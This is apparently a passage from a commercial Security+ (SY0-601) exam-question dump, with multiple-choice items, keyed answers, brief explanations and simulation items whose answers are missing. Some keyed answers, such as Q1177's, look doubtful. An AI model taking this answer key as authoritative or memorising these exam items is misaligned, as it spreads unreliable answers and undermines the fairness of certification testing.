The log retention policy
Answer: B
QUESTION 1159
Local guidelines require that all information systems meet a minimum security baseline to be
compliant. Which of the following can security administrators use to assess their system
configurations against the baseline?
A.
B.
C.
D.
SOAR playbook
Security control matrix
Risk management framework
Benchmarks
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
389
Explanation:
Benchmarks: Security benchmarks provide standardized sets of best practices and settings that
help ensure the secure configuration of an operating system or application. Organizations such
as the Center for Internet Security (CIS) provide security benchmarks that can be used to
evaluate and harden systems to meet security baselines.
QUESTION 1160
A company's public-facing website, https://www.organization.com, has an IP address of
166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage
displaying incorrect information. A quick nslookup search shows https://www.organization.com is
pointing to 151.191.122.115. Which of the following is occurring?
A.
B.
C.
D.
DoS attack
ARP poisoning
DNS spoofing
NXDOMAIN attack
Answer: C
Explanation:
Domain Name Server (DNS) spoofing, or DNS cache poisoning, is an attack involving
manipulating DNS records to redirect users toward a fraudulent, malicious website that may
resemble the user’s intended destination.
QUESTION 1161
An employee receives an email stating the employee won the lottery. The email includes a link
that requests a name, mobile phone number, address, and date of birth be provided to confirm
employee's identity before sending the prize. Which of the following best describes this type of
email?
A.
B.
C.
D.
Spear phishing
Whaling
Phishing
Vishing
Answer: C
QUESTION 1162
A company currently uses passwords for logging in to company-owned devices and wants to add
a second authentication factor. Per corporate policy, users are not allowed to have smartphones
at their desks. Which of the following would meet these requirements?
A.
B.
C.
D.
Smart card
PIN code
Knowledge-based question
Secret key
Answer: A
QUESTION 1163
The Chief Technology Officer of a local college would like visitors to utilize the school's Wi-Fi but
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
390
must be able to associate potential malicious activity to a specific person. Which of the following
would best allow this objective to be met?
A.
B.
C.
D.
Requiring all new. on-site visitors to configure their devices to use WPS
Implementing a new SSID for every event hosted by the college that has visitors
Creating a unique PSK for every visitor when they arrive at the reception area
Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
QUESTION 1164
Which of the following is most likely associated with introducing vulnerabilities on a corporate
network by the deployment of unapproved software?
A.
B.
C.
D.
Hacktivists
Script kiddies
Competitors
Shadow IT
Answer: D
Explanation:
Shadow IT refers to information technology systems used within organizations without explicit
organizational approval.
QUESTION 1165
A cybersecurity incident response team at a large company receives notification that malware is
present on several corporate desktops. No known indicators of compromise have been found on
the network. Which of the following should the team do first to secure the environment?
A.
B.
C.
D.
Contain the impacted hosts.
Add the malware to the application blocklist.
Segment the core database server.
Implement firewall rules to block outbound beaconing.
Answer: A
QUESTION 1166
An administrator receives the following network requirements for a data integration with a thirdparty vendor:
Which of the following is the most appropriate response for the administrator to send?
A. FTP is an insecure protocol and should not be used.
B. Port 8080 is a non-standard port and should be blocked.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
391
C. SSH protocol version 1 is obsolete and should not be used.
D. Certificate stapling on port 443 is a security risk that should be mitigated.
Answer: A
QUESTION 1167
A security administrator manages five on-site APs. Each AP uses different channels on a 5GHz
network. The administrator notices that another access point with the same corporate SSID on an
overlapping channel was created. Which of the following attacks most likely occurred?
A.
B.
C.
D.
E.
Jamming
NFC attacks
Disassociation
Bluesnarfing
Evil twin
Answer: E
QUESTION 1168
A security team has been alerted to a flood of incoming emails that have various subject lines and
are addressed to multiple email inboxes. Each email contains a URL shortener link that is
redirecting to a dead domain. Which of the following is the best step for the security team to take?
A.
B.
C.
D.
Create a blocklist for all subject lines.
Send the dead domain to a DNS sinkhole.
Quarantine all emails received and notify all employees.
Block the URL shortener domain in the web proxy.
Answer: D
QUESTION 1169
SIMULATION
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUSTIONS
Please click on the below items on the network diagram and configure them accordingly:
-
WAP
DHCP Server
AAA Server
Wireless Controller
LDAP Server
If at any time you would like to bring back the initial state of the simulation, please dick the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
392
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
393
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
394
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
395
Answer:
QUESTION 1170
A data administrator is configuring authentication for a SaaS application and would like to reduce
the number of credentials employees need to maintain. The company prefers to use domain
credentials to access new SaaS applications. Which of the following methods would allow this
functionality?
A.
B.
C.
D.
SSO
LEAP
MFA
PEAP
Answer: A
QUESTION 1171
Which of the following would be best suited for constantly changing environments?
A.
B.
C.
D.
RTOS
Containers
Embedded systems
SCADA
Answer: B
Explanation:
Containers are well-suited for constantly changing environments because they provide a
consistent and isolated environment for applications to run, regardless of the underlying
infrastructure. They are highly portable and can be quickly deployed, making them a flexible
solution for dynamic environments where applications need to be scaled, updated, or moved
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
396
frequently. Real-time operating systems (RTOS) are designed for predictable and deterministic
tasks, while embedded systems and SCADA are more specialized and may not be as adaptable
to rapidly changing conditions.
QUESTION 1172
A newly identified network access vulnerability has been found in the OS of legacy IoT devices.
Which of the following would best mitigate this vulnerability quickly?
A.
B.
C.
D.
Insurance
Patching
Segmentation
Replacement
Answer: C
QUESTION 1173
The local administrator account for a company's VPN appliance was unexpectedly used to log in
to the remote management interface. Which of the following would have prevented this from
happening?
A.
B.
C.
D.
Using least privilege
Changing the default password
Assigning individual user IDs
Implementing multifactor authentication
Answer: D
QUESTION 1174
Which of the following describes the exploitation of an interactive process to gain access to
restricted areas?
A.
B.
C.
D.
Persistence
Port scanning
Privilege escalation
Pharming
Answer: C
QUESTION 1175
A security analyst is assessing several company firewalls. Which of the following tools would the
analyst most likely use to generate custom packets to use during the assessment?
A.
B.
C.
D.
hping
Wireshark
PowerShell
netstat
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
397
QUESTION 1176
A local business was the source of multiple instances of credit card theft. Investigators found that
most payments at this business were made at self-service kiosks. Which of the following is the
most likely cause of the exposed credit card Information?
A.
B.
C.
D.
E.
Insider threat
RAT
Backdoor
Skimming
NFC attack
Answer: D
QUESTION 1177
An employee recently resigned from a company. The employee was responsible for managing
and supporting weekly batch jobs over the past five years. A few weeks after the employee
resigned, one of the batch jobs failed and caused a major disruption. Which of the following would
work best to prevent this type of incident from reoccurring?
A.
B.
C.
D.
Job rotation
Retention
Outsourcing
Separation of duties
Answer: D
QUESTION 1178
Following a recent security breach, an analyst discovered that user permissions were added
when joining another part of the organization but were not removed from existing groups. Which
of the following policies would help to correct these issues in the future?
A.
B.
C.
D.
Service accounts
Account audits
Password complexity
Lockout policy
Answer: B
QUESTION 1179
Which of the following ensures an organization can continue to do business with minimal
interruption in the event of a major disaster?
A.
B.
C.
D.
Business recovery plan
Incident response plan
Communication plan
Continuity of operations plan
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
398
QUESTION 1180
In a rush to meet an end-of-year business goal, the IT department was told to implement a new
business application. The security engineer reviews the attributes of the application and decides
the time needed to perform due diligence is insufficient from a cybersecurity perspective. Which
of the following BEST describes the security engineer's response?
A.
B.
C.
D.
Risk tolerance
Risk acceptance
Risk importance
Risk appetite
Answer: B
QUESTION 1181
DRAG DROP
A security engineer is setting up passwordless authentication for the first time.
INSTRUCTIONS
Drag and drop the MINIMUM set of commands to set this up and verify that it works. Commands
may only be used once, and not all will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
399
QUESTION 1182
Hotspot Question
You are a security administrator investigating a potential infection on a network.
INSTRUCTIONS
Click on each host and firewall. Review all logs to determine which host originated the infection
and then identify if each remaining host is clean or infected.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
400
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
401
QUESTION 1183
Drag and Drop Question
A data owner has been tasked with assigning proper data classifications and destruction methods
for various types of data contained within the environment.
INSTRUCTIONS
From the options below, drag each item to its appropriate classification as well as the MOST
appropriate form of disposal.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
402
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
403
About Lead2pass.com
Lead2pass.com was founded in 2006. We provide latest & high quality IT Certification Training
Exam Questions, Study Guides, Practice Tests. Lead the way to help you pass any IT Certification
exams, 100% Pass Guaranteed or Full Refund. Especially Cisco, Microsoft, CompTIA, Citrix, EMC,
HP, Oracle, VMware, Juniper, Check Point, LPI, Nortel, EXIN and so on.
Our Slogan: First Test, First Pass.
Help you to pass any IT Certification exams at the first try.
You can reach us at any of the email addresses listed below.
Sales: sales@lead2pass.com
Support: support@lead2pass.com
Technical Assistance Center: technology@lead2pass.com
Any problems about IT certification or our products, you could rely upon us, we will give you
satisfactory answers in 24 hours.
View list of all certification exams: http://www.lead2pass.com/all-products.html